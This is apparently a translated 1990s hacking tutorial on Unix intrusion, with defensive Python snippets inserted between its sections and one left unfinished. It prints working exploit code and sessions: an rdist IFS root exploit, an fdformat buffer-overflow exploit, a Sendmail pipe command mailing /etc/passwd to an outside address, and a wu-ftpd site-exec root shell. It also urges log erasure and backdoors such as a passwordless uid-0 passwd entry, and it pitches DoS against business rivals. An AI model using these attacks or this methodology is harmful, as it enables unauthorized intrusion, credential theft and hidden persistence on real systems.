1. Before getting into practical hacking
Right. From here on we go into practice. The internet and Unix may have made your head ache a little until now... Ugh~ but those theories have to be the foundation before you can understand this material. Before getting into practice, I'll explain the terms you need to know and how to use Unix, so follow along well. COME COME COME BABY!!

1.1 Understanding Unix
Hacking is practice. So I recommend that you install Linux on your computer, or, if you can manage it, get an account somewhere and study Unix. If neither is possible, I'll introduce a place where you can use Unix as much as you like while learning hacking. (Unfortunately, a few features cannot be used there..) - Those who already have an account or use Linux should take a look too.

Hackerslab - Free Hacking Zone [ http://www.hackerslab.org ]
For related matters, refer to the Hackerslab home page.
- Shell
The shell sits between the kernel and the commands; it is a kind of intermediary that interprets the commands the user gives and passes them on so the kernel can process them.

- Process
A running program and the information associated with it.

- Login
Because Unix is used by many people, you must know your own login name and password before you can connect and use its resources.
- The actual process of connecting to a computer:

    Trying 255.255.255.254...
    Connected to jungmin.org.
    Escape character is '^]'.
    SunOS 5.6
    login: salsari            # login name - type salsari
    Password:                 # password (not echoed on the screen) - type the password
    Last login: Fri Oct 8 19:17:37 from salsari.org
                              # if the password is right, you're logged in
    Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
    You have mail.
    jungmin%                  # the shell prompt appeared. Connection complete.

- Logout
The process of leaving a Unix system when you want to stop using it.

    % ^d                      # Ctrl+d (some systems block Ctrl+d; then type logout.)
    Connection closed by foreign host.

- Differences between bash and csh
When you log in, a shell prompt such as '$' or '%' appears; the former is bash(sh) and the latter is csh(tcsh). Both are used in much the same way, but there are small differences. To pick one out briefly, setting the path:

    bash(sh) : export PATH=".:/bin:/usr/bin"
    csh      : set path = (. /bin /usr/bin)

- Differences between System V and BSD Unix
As with bash and csh, there is no large difference in how they are used; only the command set differs slightly, each in its own way. Again, briefly:

System V

    % ps -ef                  # % : csh - run on Solaris
    UID   PID  PPID  C    STIME TTY      TIME CMD
    root    0     0  0   8월 05 ?        0:12 sched
    root    1     0  0   8월 05 ?        4:22 /etc/init -
    root    2     0  0   8월 05 ?        0:08 pageout
    root    3     0  1   8월 05 ?      648:44 fsflush
    root  482     1  0   8월 05 ?        0:00 /usr/lib/saf/sac -t 300
    root  401     1  0   8월 05 ?        0:00 /usr/lib/power/powerd
    ......

BSD

    $ ps -aux                 # $ : bash - run on Linux
    USER     PID %CPU %MEM SIZE  RSS TTY STAT START  TIME COMMAND
    bin      163  0.0  0.6  900  384  ?  S   Sep 14 0:00 portmap
    news     362  0.0  1.8 1668 1160  ?  S   Sep 14 0:01 /usr/sbin/innd -p4 -r
    news     377  0.0  0.4  872  280  ?  S   Sep 14 0:00 /usr/lib/news/bin/ove
    news     403  0.0  0.9 1244  616  ?  S   Sep 14 18:05 sh /usr/lib/news/bin/
    nobody 20717  0.0  1.0 1180  684  ?  S   17:05  0:00 httpd
    ......
- Permission
Shows the access rights granted on a file. Let's look at an example.

    % ls -l                   # the same function as dir in DOS
    drwxr-xr-x   2 salsari  users     512 10월  8일 19:18 .
    drwxr-xr-x 194 root     other    3584 10월  4일 10:57 ..
    -rwx------   1 salsari  users       0 10월  8일 19:27 kkk
    -rw-rw-rw-   1 salsari  users       8 10월  8일 19:22 kkk1
    -rwxrwxrwx   1 salsari  users   29836 10월  8일 19:28 salsari.hwp

    Character  Meaning         Mode value  Meaning
    d          directory       400         User (owner) read
    r          read            200         User write
    w          write           100         User execute
    x          execute         040         Group read
    -          not permitted   020         Group write
                               010         Group execute
                               004         Other read
                               002         Other write
                               001         Other execute

Learn the characters and mode values, then move on to understanding permissions.

The total number of [-] positions is 10. (If you're not sure, count them. It's clearly 10 columns. ^^) If the first column is [-], it's a regular file; if it's [d], it's a directory. The next 9 columns can be divided into three fields. ---/---/--- : taking [/] as the divider, the first field is the mode for the user (owner), the second for the group, and the third for other (other users). Within each field the first column is read (Read), the second is write (Write), and the third is execute (eXecution). By the table above, the mode values are read (r) = 4, write (w) = 2, execute (x) = 1. I suspect that still doesn't quite make sense.. --; Let's look at a concrete example.

    user read + user write + user execute + group read + other execute
    r + w + x + r + x  =  rwxr----x
    400 + 200 + 100 + 40 + 1  =  741

Got it now?... Be sure to remember it. So shall we try reading some permissions?

    drwxr-xr-x   2 salsari  users     512 10월  8일 19:18 .     # current directory
    drwxr-xr-x 194 root     other    3584 10월  4일 10:57 ..    # parent directory
A directory the owner can read, write, and execute, while the group and other users can only read and execute. [.] is the current directory and [..] is the parent directory. (mode value 755)

    -rwx------   1 salsari  users       0 10월  8일 19:27 kkk
It starts with [-], so we know it's a regular file. Since it's -/rwx/---/---, only the owner can read, write, and execute it. (mode value 700)

    -rw-rw-rw-   1 salsari  users       8 10월  8일 19:22 kkk1
A regular file; the owner, group, and other users can all read and write it. (mode value 666)

    -rwxr-xr-x   1 salsari  users   29836 10월  8일 19:28 salsari.hwp
A regular file; the owner can read, write, and execute it. The group and other users can only read and execute it.
- Set user id
As you look through files you'll occasionally see something like '-rws--x--x', with an s shown in the user execute position. An s in the user execute position like this is called setuid (set user id), and it means that while this file runs, it acts with the privileges of the file's user (owner). So what does such a file mean? Heh heh~~~ Look at the next example.

    -r-sr-xr-x   3 root     root    88620 1999년 9월 15일 bash
The file name is bash... it must be a shell. The owner is root and setuid is set... So running this file means anyone can get root privileges.. Isn't that great? Just run that file and you become root.. quite a promotion... Usually, after hacking a system, one copies a shell under a different name into a directory such as /usr/bin and sets setuid on it, to use as a backdoor.

    Mode value  Meaning        Note
    4000        Set user id
    2000        Set group id
    1000        Sticky bit     shared mode

Things like the sticky bit are used a lot on the /tmp directory.

    drwxrwxrwt   2 root     root      512 11월  8일 11:11 temp

As the example shows, anyone can create and delete files or directories in /tmp, but the only ones you can actually delete are the files and directories whose owner is you. (Heh.. too bad..) You can never delete files other people made. - That's why it's called shared mode..
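As an added example (not code from the original text), here is Python that converts between the ls -l mode strings and the octal mode values tabulated above, including the setuid, setgid and sticky bits, and then uses the conversion to find the setuid-root shell copies just described as a backdoor. The listing it scans, SAMPLE_LS, is constructed here from the page's entries plus a few extra lines.

```python
"""Mode-string <-> octal conversion for ls -l output, plus a scan for
setuid-root shell copies.  Added example; SAMPLE_LS is constructed."""

# Constructed ls -l listing: the page's bash and sh entries, a legitimate
# setuid binary, the sticky /tmp directory and an ordinary user file.
SAMPLE_LS = """\
-r-sr-xr-x 3 root    root     88620 Sep 15  1999 /bin/bash
-rwsr-xr-x 1 root    root    106496 Mar  4 00:25 /home/salsari/sh
-rwsr-xr-x 1 root    root     35000 Jan  1  1999 /usr/bin/passwd
drwxrwxrwt 2 root    root       512 Nov  8 11:11 /tmp
-rwxr-xr-x 1 salsari users    29836 Oct  8 19:28 /home/salsari/salsari.hwp
"""

SHELL_NAMES = {"sh", "bash", "csh", "tcsh", "ksh"}


def mode_to_octal(mode):
    """Turn a 10-character mode string like '-rwsr-xr-x' into an int.

    r/w/x are worth 4/2/1 in the user, group and other triples (shifted by
    6, 3 and 0 bits); an 's' in the user or group execute slot adds 4000 or
    2000, a 't' in the other execute slot adds 1000.  Upper-case S/T mean
    the special bit is set but the execute bit is not.
    """
    if len(mode) != 10:
        raise ValueError("mode string must be 10 characters: %r" % mode)
    value = 0
    for i, ch in enumerate(mode[1:]):
        who, what = divmod(i, 3)          # who: 0 user, 1 group, 2 other
        shift = 6 - 3 * who
        if ch == "-":
            continue
        if ch in "rwx":
            value |= (4 >> what) << shift
        elif ch in "sS" and what == 2 and who < 2:
            value |= 0o4000 if who == 0 else 0o2000
            value |= (1 << shift) if ch == "s" else 0
        elif ch in "tT" and what == 2 and who == 2:
            value |= 0o1000 | (1 if ch == "t" else 0)
        else:
            raise ValueError("unexpected %r at position %d in %r" % (ch, i + 1, mode))
    return value


def octal_to_mode(value, is_dir=False):
    """Inverse of mode_to_octal: render an int as the ls -l string."""
    chars = ["d" if is_dir else "-"]
    specials = (0o4000, 0o2000, 0o1000)
    for who in range(3):
        bits = (value >> (6 - 3 * who)) & 7
        chars.append("r" if bits & 4 else "-")
        chars.append("w" if bits & 2 else "-")
        execute = bool(bits & 1)
        if value & specials[who]:
            letter = "t" if who == 2 else "s"
            chars.append(letter if execute else letter.upper())
        else:
            chars.append("x" if execute else "-")
    return "".join(chars)


def find_setuid_root_shells(listing):
    """Return paths of setuid-root regular files whose basename is a shell:
    the 'copy /bin/sh, chown root, chmod 4755' backdoor described above."""
    hits = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue                      # not an ls -l entry
        mode, owner, path = parts[0], parts[2], parts[-1]
        if mode[0] != "-" or owner != "root":
            continue
        if mode_to_octal(mode) & 0o4000 and path.rsplit("/", 1)[-1] in SHELL_NAMES:
            hits.append(path)
    return hits
```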
- Redirection / pipe (|)

    > file   : the output goes into file.
    >> file  : the output is appended to file.
    < file   : the contents of file are used as input.
    << kkk   : input stops when the string kkk appears.

> Things you should try yourself:

    % cat > kkk               # to finish input, type ^D (Ctrl + D).
    % cat >> kkk
    % cat < kkk

The pipe (|) acts as a kind of filter.

    file | file1 : the output of file is used as the input of file1.

> Worth running:

    % ps -ef | grep root

> Other Unix commands in detail are omitted.. ^^; (the lame excuse of the one omitting them - study! Study!! (-.-)( -.-) )
1.2 Terms you need to know about hacking
bug : a fatal problem inside source files.
hole : a bug or routine that can become the target of an attack.
packet : the basic unit of data communication; data is cut into pieces and various related information is attached.
backdoor : a back door, a hole in the fence.
attack : attack, intrusion.
local host : the host you are currently using.
remote host : a host located elsewhere, outside.
vulnerability : a report that describes a security weakness in detail.
Advisory : a report that announces the problem and the fix for various hackable bugs or routines.
Exploit : making use of a system security weakness.

1.3 Kinds of hacking
Hacking can broadly be divided into three kinds.
- Local attack
An attack by which an intruder who has already got into the target system through a remote attack obtains root privileges. It uses bugs in the system's internal programs, manipulation of environment variables, race conditions, misconfiguration of the system by the administrator, and so on.
- Remote attack
Attacking from outside, from a remote location, using bugs in the target host's daemons, misconfiguration of NIS/NFS and the like, or information about users; the basic goal is for the outside intruder to obtain a shell on the target system.
- DOS (Denial of Service): the service denial attack. Covered in detail later.
2. Local attack
Hmm.. what shall we look at first? Shall we look at rdist, which once made such a splash on SunOS? Let's go through it while referring to the advisory on the rdist bug put out by 8lgm.

> Wait! Before that, what exactly is the principle behind the rdist hack? (Remember that every hack has a principle.) It is manipulating the IFS environment variable to obtain a root shell. So..

- What is IFS?
IFS stands for Internal Field Separator; it is the variable that defines the character used as the boundary when splitting the input string while running an external program. By default IFS is defined as a space - IFS=" ". If you want to change IFS to a slash [/], in csh do setenv IFS / and in bash do export IFS="/". To understand it, let's look at a simple example.

    $ cat > pwd1              # create the file pwd1
    #!/bin/sh                 # shell script header. uses bash(sh).
    IFS="/"                   # define IFS as [/]
    export IFS
    echo `pwd`                # show the result of pwd
    ^D                        # finish input and save
    $ pwd                     # shows the current directory as an absolute path
    /var/tmp
    $ chmod 700 pwd1          # make the permission executable
    $ pwd1                    # run the shell script we made
    var tmp                   # because IFS was set to [/], it is split into two fields, var and tmp

IFS acts as the separator for the words entered, so home, fox, ... etc. are each recognized as one word. Now let's look at the next example. Here you can see rdist's security weakness.

    % cat > distex
    #!/bin/sh
    IFS="/"
    export PATH
    /bin/sh
    ^D
    % ./distex
    distex: bin: not found    # it reports that there is no executable called bin.

Right, now let's go through it step by step.

    [8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991        # 1991... a classic indeed. Right?

    rdist(1) uses popen(3) to execute sendmail(8) as root. It can therefore be made to
    execute arbitrary programs as root.
    # the rdist program is used to distribute files to other systems
    # rdist has the IFS environment variable defined as '/'.
    # while running, rdist uses popen(3) to execute /usr/lib/sendmail.
    # IFS is used by functions such as exec() and popen().

    Any user with access to rdist(1) can become root.
    # so any user can become root via rdist..

    # Create a distfile with the following contents.
    HOSTS = localhost
    FILES = BullInTheHeather
    ${FILES} -> ${HOSTS}
        install /tmp/1 ;
        notify user ;

    # Create a file usr.c with the following contents.
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/stat.h>

    int main(void)
    {
        setuid(0);
        chown("sh", 0, 0);
        chmod("sh", 04755);
        exit(0);
    }

    # From here on it's execution mode.
    > % cp /bin/sh .          # copy /bin/sh into the current directory (.)
    > % cc -o usr usr.c       # compile usr.c
    > % set path=(. $path)    # path - make the current directory the first search path
    > % setenv IFS /          # this is the C shell. set IFS to /
    > % rdist                 # run rdist
    updating host localhost
    rdist: BullInTheHeather: No such file or directory
    notify @localhost ( user )
    > % ls -l
    -rwsr-xr-x  1 root   106496 Mar  4 00:25 sh
                              # wow~ a root shell was created in the current directory. Hack succeeded!! Root obtained!!
    > % ./sh                  # run the shell
    #                         # (root shell) # root privileges obtained

Well.. proud? There will still be Unix servers on which this bug works. Where a version before SunOS 4.1.2 is in use and hasn't been patched, this bug will succeed. - Was it last year? There was a server on which I got root with this bug... now I can barely remember which server it was.. (Only last year! With a careless administrator it works just fine. Nyahaha~)

As this shows, not only can root be obtained by manipulating environment variables (Environment Variable); race conditions (Race Condition) can also be used, and there are cases where a hole appears in security through an administrator's mistake or misconfiguration. In such cases even the administrator doesn't know (they'll surely believe they did it right..), so it can cause even bigger problems. (Usually, when a bug appears, a patch that fixes it comes out. But since the hole came from the administrator's mistake, there's obviously no such patch. - The administrator's attention and care are needed.) There is also the buffer overflow (Buffer Overflow), currently the biggest attack method in local attacks.
Race condition method -
Frequently used against programs that create temporary files. In the process of creating a temporary file, writing to it, and deleting it when the work is done, the race condition right before the write is used to put the contents you want into the file you want.

Buffer overflow -
Buffer overflows can be said to have begun with the attack on the finger daemon in the 1988 Morris Worm incident that shook the whole world. But since technical knowledge about it was lacking back then, it was not widely known until the article "Smashing the Stack for Fun and Profit" by Aleph in Phrack magazine issue 49 in 1997 presented the detailed principle and construction method of the buffer overflow; since then a large number of buffer overflow attack methods have kept appearing.

To look at the principle briefly: overflow the stack area of memory so that the return address is changed, and thereby execute arbitrary commands of your choice.. (To be honest, if I explained the original text in detail you might not understand it. Just know this much... - but what I said is the essence! The essence!!)

This time shall we look at a program that causes a buffer overflow? The fdformat file is a utility used to format disks or PCMCIA memory cards. The bug arose because it does not check its arguments.

    /* Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on 2.5.1 */
    /* attack code for Solaris 2.4 ~ 2.5.1 */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH   364
    #define EXTRA        400
    #define STACK_OFFSET 704
    #define SPARC_NOP    0xa61cc013

    /* This part is the shellcode, the core of obtaining the root shell. */
    u_char sparc_shellcode[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    /* ............. two lines of shellcode deleted ................... */
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";

    u_long get_sp(void)
    {
        __asm__("mov %sp,%i0 \n");
    }

    int main(int argc, char *argv[])
    {
        char buf[BUF_LENGTH + EXTRA + 8];
        long targ_addr;
        u_long *long_p;
        u_char *char_p;
        int i, code_length = strlen(sparc_shellcode), dso = 0;

        if (argc > 1)
            dso = atoi(argv[1]);

        long_p = (u_long *) buf;
        targ_addr = get_sp() - STACK_OFFSET - dso;
        for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
            *long_p++ = SPARC_NOP;

        char_p = (u_char *) long_p;
        for (i = 0; i < code_length; i++)
            *char_p++ = sparc_shellcode[i];

        long_p = (u_long *) char_p;
        for (i = 0; i < EXTRA / sizeof(u_long); i++)
            *long_p++ = targ_addr;

        printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
               targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
        execl("/bin/fdformat", "fdformat", &buf[1], (char *) 0);
        perror("execl failed");
        return 1;
    }

# If you don't understand it, learn Unix programming.. (me too.. me too.. --;)

To compile and run it simply:

    % gcc -o fdformat fdformat.c
    % ./fdformat
    ..... ...
    # whoami
    root

If it has been patched, of course it won't work....

I'll wrap up the story about local attacks at about this level. Roughly.. ah~ so this is how it's done.. this is how they attack... just know this much and move on.
3. Remote attack
You will have heard roughly about remote attacks above. Let's go straight into the attack~ Charge!

- The sendmail bug
The representative of remote attacks is surely this Sendmail. Because the program is much larger than others, it has correspondingly many bugs. (It has a great many local bugs too...)
This method is a bug that was popular a few years ago in sendmail version 4.1 on SunOS 4.1.x. So again, let's go through it slowly.

    % telnet salsari.org 25   # telnet into the smtp port
    Trying 255.255.255.255 ...
    Connected to salsari.org. # connected.
    Escape character is '^]'. # if you want to get out, press Ctrl + ].
    220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST
                              # check the sendmail version
    mail from:"|/bin/mail salsari@hotmail.com < /etc/passwd"
                              # a command telling it to send the /etc/passwd file to salsari@hotmail
                              # - uses the pipe (|) bug. In the from field, the command after the pipe gets executed.
    250 "|/bin/mail salsari@hotmail.com < /etc/passwd"... Sender ok
                              # the daemon accepted the input.
    rcpt to : root            # recipient root
    250 root... Recipient ok  # the daemon says "understood"
    data                      # write the message body
    354 Enter mail, end with "." on a line by itself
    babo...                   # babo (idiot)... -_- (put in anything at all.)
    .                         # typing . finishes the body.
    250 Mail accepted
    quit                      # get out.
    221 salsari.org delivering mail
    Connection closed by foreign host.
                              # the connection is closed; now just wait for the password file to arrive at your own E-mail.

Crack the password file obtained this way (if you're lucky you can get the root password too), log in locally, and then use one of the many local bugs to obtain root.
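Added example, not part of the original text: detection logic for the pipe-in-sender trick shown in the session above, run over a constructed SMTP transcript. It flags MAIL FROM / RCPT TO arguments that name a program rather than a mailbox, which is what a mail relay or a log review should alert on.

```python
"""Flag envelope addresses that name a program instead of a mailbox, the
trick used against Sendmail 4.1 above.  Added example; SAMPLE_SMTP is a
constructed client/server transcript, not a capture from a real server."""
import re

SAMPLE_SMTP = """\
220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST
helo attacker.example
mail from:"|/bin/mail salsari@hotmail.com < /etc/passwd"
250 "|/bin/mail salsari@hotmail.com < /etc/passwd"... Sender ok
rcpt to: root
250 root... Recipient ok
mail from:<salsari@salsari.org>
250 <salsari@salsari.org>... Sender ok
rcpt to:<jungmin@jungmin.org>
"""

# Client envelope commands; server replies start with a 3-digit code and
# therefore never match.
ENVELOPE = re.compile(r"^\s*(mail\s+from|rcpt\s+to)\s*:\s*(.*)$", re.IGNORECASE)

# Characters a mailbox name never needs but a shell command line does.
SHELL_META = set("|;`$<>&")


def envelope_addresses(transcript):
    """Return (verb, raw argument) for every MAIL FROM / RCPT TO line."""
    found = []
    for line in transcript.splitlines():
        m = ENVELOPE.match(line)
        if m:
            verb = " ".join(m.group(1).lower().split())
            found.append((verb, m.group(2).strip()))
    return found


def is_pipe_address(arg):
    """True when the address is a program: it starts with '|' once any
    quotes or angle brackets are removed, or it carries shell metacharacters."""
    inner = arg.strip().strip("<>").strip('"').strip()
    if inner.startswith("|"):
        return True
    return any(c in SHELL_META for c in inner)


def flag_pipe_addresses(transcript):
    """The envelope commands an operator should be alerted on."""
    return [(verb, arg) for verb, arg in envelope_addresses(transcript)
            if is_pipe_address(arg)]
```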
Now let's look at a somewhat more recent bug, in wu-ftp version 2.4. With this bug the site exec command can be executed, so a root shell can be obtained easily.

    COMMAND          wu.ftpd(8)
    SYSTEMS AFFECTED Sites running wuarchive ftpd versions prior to 2.3 or running "wrl" ftpd version ??
    PROBLEM:                  # the site exec command can run shell commands from within ftp.

    Compile program :         # attack source - write it and then compile it.
                              # compile : cc -o ftpbug ftpbug.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        seteuid(0);
        system("cp /bin/sh /tmp/.sh");
        system("chmod 6777 /tmp/.sh");
        return 0;
    }

    Login to the system :     # once compiled, connect with ftp
    220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
    Name (exploitablesys:root): goodaccount    # enter your own user name
    331 Password required for goodaccount.
    Password: (password)                       # enter the password
    230 User goodaccount logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.

    See if system is exploitable :             # test whether the ftp bug exists.
    ftp> quote "site exec bash -c id"          # when you enter this command...
    200-bash -c id                             # runs the id command
    200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
    200 (end of 'bash -c id')                  # if the result comes out like this, it's a target.

    Exploit system :          # if the test succeeded, actually attack.
                              # running the attack code you prepared creates a .sh file at /tmp/.sh
                              # that gives root privileges.
    ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
    200-bash -c /yer/home/dir/ftpbug
    200 (end of 'bash -c /yer/home/dir/ftpbug')
    ftp> quit                 # we've run it, so get out now.
    221 Goodbye.              # then run /tmp/.sh!!!! From now on you are root!!!

We've looked at two examples of remote attacks, but both are holes created by misconfiguration. Besides these there are buffer overflows caused by bugs in daemons. The representative one is the recently released remote buffer overflow in the wu-ftp 2.4.2 versions.
4. Recent bugs
- linux
  Linux_INN - Red Hat Linux 6.0 INN vulnerability and countermeasures
  Linux_pop2d - pop2d vulnerability and countermeasures
  Linux super buffer overflow - super buffer overflow vulnerability and countermeasures
- sun / solaris
  SUN-automountd - SUN automountd vulnerability
  SUN-passwd - Sun passwd denial of service vulnerability and countermeasures
  Sun man/catman - Sun man/catman vulnerability and countermeasures
  Sun CDE - Sun CDE vulnerability and countermeasures
  SUN sdtcm_convert - sdtcm_convert vulnerability and countermeasures
  Solaris_libc - Solaris libc vulnerability and countermeasures
- HP/UX
  HP sendmail DOS - HP Sendmail DOS vulnerability and countermeasures
  HP_ftp - HP-UX ftp vulnerability and countermeasures
  HP CDE ttsession - HP CDE ttsession vulnerability and countermeasures
- AIX
  AIX Vulnerability in ptrace() system call - AIX ptrace() system call denial of service vulnerability
  AIX named-xfer security problem - AIX named-xfer security vulnerability and countermeasures
  AIX pdnsd buffer overflow - IBM AIX pdnsd buffer overflow vulnerability and countermeasures
- IRIX
  IRIX X server path - IRIX X server path vulnerability and countermeasures
  IRIX_midikeys - IRIX midikeys vulnerability and countermeasures
- DOS
  tcp-denial-of-service - TCP/IP denial of service vulnerability and countermeasures
  Using the Domain Name System DoS attack - denial of service (DoS) attack using the Domain Name System
- trojan / virus
  Trojan Tcp Wrapper - trojan horse version of TCP Wrapper
  Melissa-Macro-Virus - Melissa macro virus
  CIH-Virus - CIH virus
- FTP
  FTP-buffer overflows - FTP Buffer Overflows vulnerability and countermeasures
  Remote buffer overflow in ftpd daemon:
    ProFTPD versions before 1.2.0pre1 are vulnerable
    all wu-ftpd versions up to 2.4.2(beta 18) are vulnerable
    wu-ftpd VR series - versions before 2.4.2(beta 18) VR10 are vulnerable
    BeroFTPD versions before 1.2.0 are vulnerable
    NcFTPd versions before 2.3.4 are vulnerable
  Crashing FTP Serv-U 2.5 - FTP Serv-U 2.5 vulnerability and countermeasures
- ETC
  lsof buffer overflow - lsof buffer overflow vulnerability and countermeasures
  umapfs - umapfs vulnerability and countermeasures
  cmsd-Buffer Overflow - Calendar Manager buffer overflow vulnerability and countermeasures
  Accelerated-X Overflow - Accelerated-X X server vulnerability and countermeasures
  Tiger vulnerability - Tiger vulnerability and countermeasures
  amd buffer overflow vulnerability - amd remote buffer overflow vulnerability and countermeasures
5. Hackers' hacking methodology
Above you saw how root is obtained on a local host and how root is taken on a remote host. But these methods can be regarded as extremely drastic ones. So we need to find out what sequence hackers go through to hack a single system, and how they hack it to take root.

5.1 Information gathering
First, if the system you use is A and the target of the attack is B, you will have to gather information related to B. Of course, if you have an account on B, or know one, the work gets easier, but if not, you have to get into B somehow. (Because compared to remote bugs, local bugs are endless... and if you can become root using a remote bug, even better...) To do that you look, with things like finger, smtp, rusers, rpcinfo and so on, for whether there is a usable account or whether it has a remote bug. There are also remote bug scan programs that report bugs to you automatically. sscan and mscan are representative examples. You also need to know the administrator's patterns. At what times does he log in and work? What login name (account) other than root does the administrator use? And how long is root's idle time? (The longer root's idle time, the lazier the administrator managing the system, you could say.) Once you've gathered information about the system, you have to draw up a concrete plan.

5.2 Planning
Which way will you go?
- Is there a remote bug on B through which root can be obtained, so that you become root directly?
- Will you take root on A and then use root privileges to get an account on B?
- Is there a weak account on B to get in through?
- Will you crack a passwd file obtained via a cgi bug or the like?
If you got in directly as root - matters concerning erasing log information and installing a backdoor.
If you got in as a user - find a local bug on B, then obtain root privileges. - Erase log information and install a backdoor so you can get in easily.
So, have you drawn up the plan and put it in order?

5.3 Remote attack
Carry out the remote attack. Whether it yields root or ordinary user privileges, first get into B!

5.4 Local attack
Take root with a local bug.

5.5 Erasing traces
If the intrusion succeeded and you obtained root privileges, you will have left traces. Look at the last command, /var/adm(log)/messages, /var/adm/utmp, /var/adm/wtmp and so on, and you will find traces left behind; these traces have to be deleted without anyone noticing and without any other change.

5.6 Installing a backdoor
Do you have to hack all over again to connect to system B again? No. Isn't there such a thing as a backdoor? A backdoor (back door) is one way of getting into a system easily when coming back after hacking it. There are quite a lot of kinds of backdoors. Details are in 6.4.5.

5.7 And enjoy
Run around as you please. Try managing the administrators and play with it like your own system. But don't do anything that harms the system. That is what crackers do. Quietly, quietly, play with it without anyone knowing. Don't forget...
6. Other hacking techniques.
6.1 packet sniffing
A sniffer is a program that captures packets travelling on the network. Its original purpose was network debugging, but just as a security tool is also a hacking tool, it was soon loved by hackers. On Ethernet, when host A sends a packet to host B, the packet is broadcast across the whole Ethernet. The host with the designated address takes the packet, and the other hosts ignore it because it isn't addressed to them. You probably get the idea roughly. What if those ignored packets were processed instead of ignored? That is where sniffing was born.

    -- TCP/IP LOG -- TM: Tue Feb 15 17:04:55 --
    PATH: salsari.org(1953) => jungmin.org(ftp)
    STAT: Sun Apr 14 18:09:23, 14 pkts, 49 bytes [TH_FIN]
    DATA:
     USER salsari
     : PASS jungminlove
     : CWD backup
     : NLST
     : QUIT
    --

6.2 Spoofing
- IP spoofing
The attack method of exploiting a defect in the TCP/IP protocol to impersonate the IP of a host in a trust relationship and intrude is called IP spoofing. This defect was mentioned in Robert Morris's 1985 paper "A Weakness in the 4.2 BSD UNIX TCP/IP Software", and in 1995 the famous hacker Kevin Mitnick put the theory into practice.
> A moment here!! The R commands (rlogin, rsh, rcp) are commands that refer to the contents of $HOME/.rhosts on the target system and access the home directory without any authentication. You could call them the very synonym of a trust relationship.
- DNS spoofing
An attack method that disables the DNS server with a DOS attack, sends DNS information that makes a target host, which authenticates by host name, trust the hacker's host, and then uses commands such as rlogin and rsh.
- Web spoofing
The method of imitating the target web site on the Web to steal information.

6.3 IP hijacking
Watching a state in which a connection exists between two hosts and then cutting in in the middle, using redirection, one of the weaknesses of the TCP protocol, is called hijacking. It can bypass the protection mechanisms provided by one-time passwords such as SKEY or ticket-based authentication systems such as Kerberos, and get in.

6.4 DOS
DOS (Denial Of Service) is the service denial attack. Put simply, it is an attack that makes the services (ftp, smtp, telnet....) of the target host stupid so they can't do their job. Such an attack isn't much help to us, but what if an Internet service provider (ISP) A is competing with a provider B? Naturally you will choose the ISP whose service works well and is fast. So if a hacker hired by A takes B's systems down with DOS.. B's service won't work well.. users will be inconvenienced.. and so users will flock to A rather than to B, whose service doesn't work well. With DOS, the attacker can't be identified well either. (Since spoofing is used, it's hard to discover who is attacking the system with DOS.) Well.. that's how it goes... DOS attacks include smurf, teardrop, ping flooding, syn flooding, mail bombs, and so on.. countless. They can just stop a service from doing its job, or they can wreck the whole system.
6.5 BackDoor
- Password backdoor
> A look at the password file:

    root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
    salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash

A password entry is divided into 7 fields.

    user name : password     : user ID : group ID : name : home directory : shell
    root      : fVi3dx5Ytkdo : 0       : 0        : root : /              : /bin/bash

Oho~ easier than I thought.. everyone.. you get it? So shall we plant a backdoor in the password file? Put the following into /etc/passwd.

    $ echo "hacker::0:0:hacker:/:/bin/bash" >> /etc/passwd

If the user ID:group ID is set to 0:0, it means the account has root privileges. So the user hacker can log in with root privileges and without a password... A backdoor can be made this way too, but it is easily caught. So you can put it somewhere in the middle of the password file, or change the user ID and group ID of a rarely used user to 0:0 and use that.

- .rhosts backdoor
Unix's rsh and rlogin commands work by referring to the .rhosts file in the home directory. If you put + + in .rhosts, anyone can connect to the system without a password.
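Added example, not part of the original text: a small Python audit of /etc/passwd and .rhosts contents for the two backdoor patterns just described (extra uid-0 or password-less accounts, and "+ +" trust entries). The inputs are constructed from the page's sample entries plus an injected line; they are not a real system's files.

```python
"""Audit /etc/passwd and .rhosts text for the backdoor patterns above.
Added example; the inputs are constructed, not a real system's files."""

# Constructed: the page's two entries, the injected 'hacker' line and a
# stale account whose uid/gid were changed to 0:0.
SAMPLE_PASSWD = """\
root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash
hacker::0:0:hacker:/:/bin/bash
oldguy:x:0:0:left in 1998:/home/oldguy:/bin/sh
"""

# Constructed .rhosts: one normal trust entry and the '+ +' wildcard.
SAMPLE_RHOSTS = """\
# trusted hosts for rlogin/rsh
jungmin.org salsari
+ +
"""


def parse_passwd(text):
    """Return (entries, malformed): entries are 7-tuples with numeric uid/gid,
    malformed are (line number, line) pairs that do not have that shape."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append((name, pw, int(uid), int(gid), gecos, home, shell))
    return entries, malformed


def audit_passwd(text):
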